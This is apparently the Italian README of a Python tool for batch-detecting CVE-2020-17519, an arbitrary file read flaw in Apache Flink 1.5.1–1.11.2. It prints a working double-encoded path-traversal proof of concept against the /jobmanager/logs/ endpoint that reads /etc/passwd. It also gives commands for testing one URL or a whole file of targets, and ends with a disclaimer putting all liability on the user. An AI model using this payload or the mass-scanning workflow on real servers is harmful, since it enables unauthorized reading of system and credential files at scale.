
CVE-2020-17519; Apache Flink lettura arbitraria di file; rilevamento batch
Apache Flink 1.5.1 ~ 1.11.2
POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
python3 CVE-2020-17519 --help Visualizza la guida all'uso
python3 CVE-2020-17519 -u http://127.0.0.1:8080 Rileva se un determinato indirizzo presenta la vulnerabilità
python3 CVE-2020-17519 -f target.txt Rilevamento batch della vulnerabilità
Qualsiasi conseguenza o perdita, diretta o indiretta, causata dalla diffusione o dall'utilizzo delle informazioni fornite in questo documento sarà a esclusivo carico dell'utente; l'autore non si assume alcuna responsabilità in merito.